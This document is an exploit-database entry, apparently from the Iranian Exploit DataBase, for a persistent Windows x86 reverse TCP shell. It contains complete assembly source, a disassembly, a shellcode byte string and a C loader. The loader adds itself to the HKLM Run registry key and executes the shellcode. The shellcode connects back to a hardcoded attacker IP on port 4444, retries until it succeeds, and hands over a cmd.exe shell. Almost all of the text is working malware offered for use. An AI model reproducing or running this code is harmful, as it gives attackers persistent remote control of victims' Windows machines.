###########################

# Windows x86 persistent reverse shell tcp

###########################

/*
    # Title : Windows x86 persistent reverse shell tcp
    # Author : Roziul Hasan Khan Shifat
    # Date : 04-09-2016
    # Tested on : Windows 7 x86 
*/
 
 
/*
Note : This program must be run as adminstrator for 1st time . otherwise it won't be persistent
*/
 
 
/*
section .text
    global _start
_start:
 
 
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;kernel32.dll
 
 
mov ebx,[ecx+0x3c] ;DOS->elf_anew
add ebx,ecx ;PE HEADER
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
 
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
 
 
xor edx,edx
 
g:
 
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jne g
cmp dword [eax+4],'rocA'
jne g
cmp dword [eax+8],'ddre'
jne g
 
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
 
 
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()
 
xor eax,eax
push eax
 
sub esp,24
 
lea esi,[esp]
 
mov [esi],dword edx ;GetProcAddress() at offset 0
mov edi,ecx ;kernel32.dll
 
;------------------------------
;finding address of CreateProcessA()
 
push 0x42424173
mov [esp+2],word ax
push 0x7365636f
push 0x72506574
push 0x61657243
 
lea eax,[esp]
 
push eax
push ecx
 
call edx
;----------------------------
add esp,16
 
mov [esi+4],dword eax ;CreateProcessA() at offset 4
;-----------------------------
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
 
lea ecx,[esp]
 
push ecx
push edi
 
call dword [esi]
 
add esp,12
 
mov [esi+8],dword eax ;ExitProcess() at offset 8
;-----------------------------------------------------
;loading ws2_32.dll
 
 
xor ecx,ecx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c
 
lea ecx,[esp]
 
push ecx
push edi
 
call dword [esi]
 
add esp,12
 
xor ecx,ecx
push 0x41416c6c
mov [esp+2],word cx
push 0x642e3233
push 0x5f327377
lea ecx,[esp]
 
push ecx
call eax
add esp,8
 
mov edi,eax ;ws2_32.dll
 
;-----------------------------------
;finding address of WSAStartup()
xor ecx,ecx
push 0x41417075
mov [esp+2],word cx
push 0x74726174
push 0x53415357
 
lea ecx,[esp]
push ecx
push eax
 
call dword [esi]
add esp,12
 
mov [esi+12],dword eax ;WSAStartup() at offset 12
 
;------------------------------------------
;finding address of WSASocketA()
 
xor ecx,ecx
push 0x42424174
mov [esp+2],word cx
push 0x656b636f
push 0x53415357
 
lea ecx,[esp]
 
push ecx
push edi
 
call dword [esi]
add esp,12
 
mov [esi+16],dword eax ;WSASocketA() at offset 16
;-----------------------------
;finding address of WSAConnect()
xor ecx,ecx
push 0x41417463
mov [esp+2],word cx
push 0x656e6e6f
push 0x43415357
 
lea ecx,[esp]
 
push ecx
push edi
 
call dword [esi]
add esp,12
 
mov [esi+20],dword eax ;WSAConnect() at offset 20
;------------------------------------------------
 
;WSAStartup(514, &WSADATA)
 
xor ecx,ecx
push ecx
mov cx,400
 
sub esp,ecx
 
lea ecx,[esp]
 
xor ebx,ebx
mov bx,514
 
push ecx
push ebx
 
call dword [esi+12]
 
;-------------------------------
 
;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL)
 
xor ecx,ecx
push ecx
push ecx
push ecx
 
mov cl,6
push ecx
 
sub ecx,5
push ecx
 
inc ecx
push ecx
 
call dword [esi+16]
 
xchg edi,eax ;SOCKET
 
;--------------------------------------------------
;WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL)
xor ecx,ecx
push ecx
push ecx
push ecx
push ecx
 
mov [esp],byte 2
mov [esp+2],word 0x5c11 ;port 4444 (change it if U want)
mov [esp+4],dword 0x81e8a8c0 ;Change it 
 
connect:
xor ecx,ecx
lea ebx,[esp]
 
push ecx
push ecx
push ecx
push ecx
 
 
mov cl,16
 
 
push ecx
push ebx
push edi
 
call dword [esi+20]
xor ecx,ecx
 
cmp eax,ecx
jnz connect
;----------------------------------------------
 
xor ecx,ecx
 
sub esp,16
lea edx,[esp] ;PROCESS_INFORMATION
 
push edi
push edi
push edi
push ecx
push word cx
push word cx
 
mov cl,255
inc ecx
 
push ecx
xor ecx,ecx
 
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
 
mov cl,68
 
push ecx
 
lea ecx,[esp]
 
 
xor edx,edx
push 0x41657865
mov [esp+3],byte dl
push 0x2e646d63
 
lea edx,[esp]
;-----------------------------
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&ini_processo,&processo_info)
 
push ebx
push ecx
 
xor ecx,ecx
 
push ecx
push ecx
push ecx
 
inc ecx
push ecx
xor ecx,ecx
 
push ecx
push ecx
push edx
push ecx
 
call dword [esi+4]
 
push eax
call dword [esi+8]
*/
 
 
/*
Disassembly of section .text:
 
00000000 <_start>:
   0:   31 c9                   xor    %ecx,%ecx
   2:   64 8b 41 30             mov    %fs:0x30(%ecx),%eax
   6:   8b 40 0c                mov    0xc(%eax),%eax
   9:   8b 70 14                mov    0x14(%eax),%esi
   c:   ad                      lods   %ds:(%esi),%eax
   d:   96                      xchg   %eax,%esi
   e:   ad                      lods   %ds:(%esi),%eax
   f:   8b 48 10                mov    0x10(%eax),%ecx
  12:   8b 59 3c                mov    0x3c(%ecx),%ebx
  15:   01 cb                   add    %ecx,%ebx
  17:   8b 5b 78                mov    0x78(%ebx),%ebx
  1a:   01 cb                   add    %ecx,%ebx
  1c:   8b 73 20                mov    0x20(%ebx),%esi
  1f:   01 ce                   add    %ecx,%esi
  21:   31 d2                   xor    %edx,%edx
 
00000023 <g>:
  23:   42                      inc    %edx
  24:   ad                      lods   %ds:(%esi),%eax
  25:   01 c8                   add    %ecx,%eax
  27:   81 38 47 65 74 50       cmpl   $0x50746547,(%eax)
  2d:   75 f4                   jne    23 <g>
  2f:   81 78 04 72 6f 63 41    cmpl   $0x41636f72,0x4(%eax)
  36:   75 eb                   jne    23 <g>
  38:   81 78 08 64 64 72 65    cmpl   $0x65726464,0x8(%eax)
  3f:   75 e2                   jne    23 <g>
  41:   8b 73 1c                mov    0x1c(%ebx),%esi
  44:   01 ce                   add    %ecx,%esi
  46:   8b 14 96                mov    (%esi,%edx,4),%edx
  49:   01 ca                   add    %ecx,%edx
  4b:   31 c0                   xor    %eax,%eax
  4d:   50                      push   %eax
  4e:   83 ec 18                sub    $0x18,%esp
  51:   8d 34 24                lea    (%esp),%esi
  54:   89 16                   mov    %edx,(%esi)
  56:   89 cf                   mov    %ecx,%edi
  58:   68 73 41 42 42          push   $0x42424173
  5d:   66 89 44 24 02          mov    %ax,0x2(%esp)
  62:   68 6f 63 65 73          push   $0x7365636f
  67:   68 74 65 50 72          push   $0x72506574
  6c:   68 43 72 65 61          push   $0x61657243
  71:   8d 04 24                lea    (%esp),%eax
  74:   50                      push   %eax
  75:   51                      push   %ecx
  76:   ff d2                   call   *%edx
  78:   83 c4 10                add    $0x10,%esp
  7b:   89 46 04                mov    %eax,0x4(%esi)
  7e:   31 c9                   xor    %ecx,%ecx
  80:   68 65 73 73 41          push   $0x41737365
  85:   88 4c 24 03             mov    %cl,0x3(%esp)
  89:   68 50 72 6f 63          push   $0x636f7250
  8e:   68 45 78 69 74          push   $0x74697845
  93:   8d 0c 24                lea    (%esp),%ecx
  96:   51                      push   %ecx
  97:   57                      push   %edi
  98:   ff 16                   call   *(%esi)
  9a:   83 c4 0c                add    $0xc,%esp
  9d:   89 46 08                mov    %eax,0x8(%esi)
  a0:   31 c9                   xor    %ecx,%ecx
  a2:   51                      push   %ecx
  a3:   68 61 72 79 41          push   $0x41797261
  a8:   68 4c 69 62 72          push   $0x7262694c
  ad:   68 4c 6f 61 64          push   $0x64616f4c
  b2:   8d 0c 24                lea    (%esp),%ecx
  b5:   51                      push   %ecx
  b6:   57                      push   %edi
  b7:   ff 16                   call   *(%esi)
  b9:   83 c4 0c                add    $0xc,%esp
  bc:   31 c9                   xor    %ecx,%ecx
  be:   68 6c 6c 41 41          push   $0x41416c6c
  c3:   66 89 4c 24 02          mov    %cx,0x2(%esp)
  c8:   68 33 32 2e 64          push   $0x642e3233
  cd:   68 77 73 32 5f          push   $0x5f327377
  d2:   8d 0c 24                lea    (%esp),%ecx
  d5:   51                      push   %ecx
  d6:   ff d0                   call   *%eax
  d8:   83 c4 08                add    $0x8,%esp
  db:   89 c7                   mov    %eax,%edi
  dd:   31 c9                   xor    %ecx,%ecx
  df:   68 75 70 41 41          push   $0x41417075
  e4:   66 89 4c 24 02          mov    %cx,0x2(%esp)
  e9:   68 74 61 72 74          push   $0x74726174
  ee:   68 57 53 41 53          push   $0x53415357
  f3:   8d 0c 24                lea    (%esp),%ecx
  f6:   51                      push   %ecx
  f7:   50                      push   %eax
  f8:   ff 16                   call   *(%esi)
  fa:   83 c4 0c                add    $0xc,%esp
  fd:   89 46 0c                mov    %eax,0xc(%esi)
 100:   31 c9                   xor    %ecx,%ecx
 102:   68 74 41 42 42          push   $0x42424174
 107:   66 89 4c 24 02          mov    %cx,0x2(%esp)
 10c:   68 6f 63 6b 65          push   $0x656b636f
 111:   68 57 53 41 53          push   $0x53415357
 116:   8d 0c 24                lea    (%esp),%ecx
 119:   51                      push   %ecx
 11a:   57                      push   %edi
 11b:   ff 16                   call   *(%esi)
 11d:   83 c4 0c                add    $0xc,%esp
 120:   89 46 10                mov    %eax,0x10(%esi)
 123:   31 c9                   xor    %ecx,%ecx
 125:   68 63 74 41 41          push   $0x41417463
 12a:   66 89 4c 24 02          mov    %cx,0x2(%esp)
 12f:   68 6f 6e 6e 65          push   $0x656e6e6f
 134:   68 57 53 41 43          push   $0x43415357
 139:   8d 0c 24                lea    (%esp),%ecx
 13c:   51                      push   %ecx
 13d:   57                      push   %edi
 13e:   ff 16                   call   *(%esi)
 140:   83 c4 0c                add    $0xc,%esp
 143:   89 46 14                mov    %eax,0x14(%esi)
 146:   31 c9                   xor    %ecx,%ecx
 148:   51                      push   %ecx
 149:   66 b9 90 01             mov    $0x190,%cx
 14d:   29 cc                   sub    %ecx,%esp
 14f:   8d 0c 24                lea    (%esp),%ecx
 152:   31 db                   xor    %ebx,%ebx
 154:   66 bb 02 02             mov    $0x202,%bx
 158:   51                      push   %ecx
 159:   53                      push   %ebx
 15a:   ff 56 0c                call   *0xc(%esi)
 15d:   31 c9                   xor    %ecx,%ecx
 15f:   51                      push   %ecx
 160:   51                      push   %ecx
 161:   51                      push   %ecx
 162:   b1 06                   mov    $0x6,%cl
 164:   51                      push   %ecx
 165:   83 e9 05                sub    $0x5,%ecx
 168:   51                      push   %ecx
 169:   41                      inc    %ecx
 16a:   51                      push   %ecx
 16b:   ff 56 10                call   *0x10(%esi)
 16e:   97                      xchg   %eax,%edi
 16f:   31 c9                   xor    %ecx,%ecx
 171:   51                      push   %ecx
 172:   51                      push   %ecx
 173:   51                      push   %ecx
 174:   51                      push   %ecx
 175:   c6 04 24 02             movb   $0x2,(%esp)
 179:   66 c7 44 24 02 11 5c    movw   $0x5c11,0x2(%esp)
 180:   c7 44 24 04 c0 a8 e8    movl   $0x81e8a8c0,0x4(%esp)
 187:   81 
 
00000188 <connect>:
 188:   31 c9                   xor    %ecx,%ecx
 18a:   8d 1c 24                lea    (%esp),%ebx
 18d:   51                      push   %ecx
 18e:   51                      push   %ecx
 18f:   51                      push   %ecx
 190:   51                      push   %ecx
 191:   b1 10                   mov    $0x10,%cl
 193:   51                      push   %ecx
 194:   53                      push   %ebx
 195:   57                      push   %edi
 196:   ff 56 14                call   *0x14(%esi)
 199:   31 c9                   xor    %ecx,%ecx
 19b:   39 c8                   cmp    %ecx,%eax
 19d:   75 e9                   jne    188 <connect>
 19f:   31 c9                   xor    %ecx,%ecx
 1a1:   83 ec 10                sub    $0x10,%esp
 1a4:   8d 14 24                lea    (%esp),%edx
 1a7:   57                      push   %edi
 1a8:   57                      push   %edi
 1a9:   57                      push   %edi
 1aa:   51                      push   %ecx
 1ab:   66 51                   push   %cx
 1ad:   66 51                   push   %cx
 1af:   b1 ff                   mov    $0xff,%cl
 1b1:   41                      inc    %ecx
 1b2:   51                      push   %ecx
 1b3:   31 c9                   xor    %ecx,%ecx
 1b5:   51                      push   %ecx
 1b6:   51                      push   %ecx
 1b7:   51                      push   %ecx
 1b8:   51                      push   %ecx
 1b9:   51                      push   %ecx
 1ba:   51                      push   %ecx
 1bb:   51                      push   %ecx
 1bc:   51                      push   %ecx
 1bd:   51                      push   %ecx
 1be:   51                      push   %ecx
 1bf:   b1 44                   mov    $0x44,%cl
 1c1:   51                      push   %ecx
 1c2:   8d 0c 24                lea    (%esp),%ecx
 1c5:   31 d2                   xor    %edx,%edx
 1c7:   68 65 78 65 41          push   $0x41657865
 1cc:   88 54 24 03             mov    %dl,0x3(%esp)
 1d0:   68 63 6d 64 2e          push   $0x2e646d63
 1d5:   8d 14 24                lea    (%esp),%edx
 1d8:   53                      push   %ebx
 1d9:   51                      push   %ecx
 1da:   31 c9                   xor    %ecx,%ecx
 1dc:   51                      push   %ecx
 1dd:   51                      push   %ecx
 1de:   51                      push   %ecx
 1df:   41                      inc    %ecx
 1e0:   51                      push   %ecx
 1e1:   31 c9                   xor    %ecx,%ecx
 1e3:   51                      push   %ecx
 1e4:   51                      push   %ecx
 1e5:   52                      push   %edx
 1e6:   51                      push   %ecx
 1e7:   ff 56 04                call   *0x4(%esi)
 1ea:   50                      push   %eax
 1eb:   ff 56 08                call   *0x8(%esi)
*/
 
 
#include<stdio.h>
#include<windows.h>
#include<string.h>
 
char shellcode[]=\
 
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xc0\x50\x83\xec\x18\x8d\x34\x24\x89\x16\x89\xcf\x68\x73\x41\x42\x42\x66\x89\x44\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x04\x24\x50\x51\xff\xd2\x83\xc4\x10\x89\x46\x04\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x08\x89\xc7\x31\xc9\x68\x75\x70\x41\x41\x66\x89\x4c\x24\x02\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x50\xff\x16\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x68\x74\x41\x42\x42\x66\x89\x4c\x24\x02\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x10\x31\xc9\x68\x63\x74\x41\x41\x66\x89\x4c\x24\x02\x68\x6f\x6e\x6e\x65\x68\x57\x53\x41\x43\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x14\x31\xc9\x51\x66\xb9\x90\x01\x29\xcc\x8d\x0c\x24\x31\xdb\x66\xbb\x02\x02\x51\x53\xff\x56\x0c\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x10\x97\x31\xc9\x51\x51\x51\x51\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\xe8\x81\x31\xc9\x8d\x1c\x24\x51\x51\x51\x51\xb1\x10\x51\x53\x57\xff\x56\x14\x31\xc9\x39\xc8\x75\xe9\x31\xc9\x83\xec\x10\x8d\x14\x24\x57\x57\x57\x51\x66\x51\x66\x51\xb1\xff\x41\x51\x31\xc9\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\xb1\x44\x51\x8d\x0c\x24\x31\xd2\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x14\x24\x53\x51\x31\xc9\x51\x51\x51\x41\x51\x31\xc9\x51\x51\x52\x51\xff\x56\x04\x50\xff\x56\x08";
 
int main(int li,char *a[])
{
char info[200];
DWORD l;
HKEY i;
 
 
     RegOpenKeyA(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&i);
  int r= RegQueryValueExA(i,"reverse_shell_tcp",0,NULL,(LPBYTE)info,&l);
    
   if(i!=0)
   {
    RegSetValueExA(i,"reverse_shell_tcp",0,REG_SZ,a[0],strlen(a[0]));
    RegCloseKey(i);
   }
   else
   RegCloseKey(i);
    
    
    
    
    int mode;
 
 
 
    if(li==1)
    mode=1;
    else
    mode=atoi(a[1]);
 
switch(mode)
{
     
     
 
    case 78:
    (* (int(*)())shellcode )();
    break;
     
    case 1:
    default:
        ShellExecute(NULL,NULL,a[0],"78",NULL,0);
    break;
}
 
    
   return 0;
    
}

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-10-15]

###########################